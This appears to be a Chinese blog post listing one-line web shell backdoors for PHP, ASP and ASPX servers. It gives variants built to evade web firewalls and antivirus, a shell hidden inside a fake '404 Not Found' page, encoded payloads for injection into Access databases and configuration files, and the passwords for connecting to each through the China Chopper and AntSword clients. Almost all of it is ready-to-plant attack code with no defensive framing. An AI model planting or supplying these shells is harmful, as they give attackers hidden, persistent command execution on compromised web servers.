PHP一句话:
1、普通一句话:
<?php @eval($_POST[123456]); ?>
*post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码
2、防爆破一句话:
<?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['password']); ?> *菜刀地址http://192.168.64.137/x.php?x=myh0st
3、过狗一句话:
<?php ($_=@$_GET[s]).@$_($_POST[hihack]) ?> //菜刀地址 http://localhost/1.php?s=assert <php $a = "a"."s"."s"."e"."r"."t"; $a($_POST[hihack]); ?>
4、404隐藏的一句话:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body <h1>Not Found</h1> <p>The requested URL /error.php was not found on this server. </p> </body></html> <?php @preg_replace("/[checksql]/e",$_POST['hihack'],"saft"); ?>
菜刀连接时在配置栏添加:
<O>date=@eval($_POST[paxmac]);</O>
5、不用问号(?)的一句话:
<script language="php">eval ($_POST[hihack]);</script>
6、躲避检测:
<?php assert($_REQUEST["hihack"]);?>
7、变形一句话后门:
访问该网页,然后菜刀连接:/myh0st.php 密码:hihack
ASP一句话:
1、普通一句话:
<%eval request("hihack")%>或<%execute(request("hihack"))%>
2、unicode编码的access木马 :
向access数据库插入 ┼攠數畣整爠煥敵瑳∨≡┩> 编码前:<% execute request("a")%>
然后备份出webshell,密码a
3、配置文件插马(需要条件支持,插入的数据被写在了配置文件中):
插入:"%><% bbbb=request("aaaa")%><%eval(bbbb)%><%'
访问报错,获取到配置文件的地址,然后连接,密码aaaa
4、不用%的一句话:
<script language=VBScript runat=server>execute request("hihack")</script>
5、不用双引号(“)的一句话:
<%eval request(chr(35))%> 密码:#
ASPX一句话:
1、普通一句话:
<%@ Page Language=”Jscript”%> <%eval(Request.Item[“hihack”],”unsafe”);%>
2、免杀一句话:
<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request[“x61x62x63x64”];eval(PAY,”x75x6Ex73x61”+”x66x65”);%>
标签:配置文件,一句,常见,密码,hihack,菜刀,php From: https://www.cnblogs.com/simono/p/16631693.html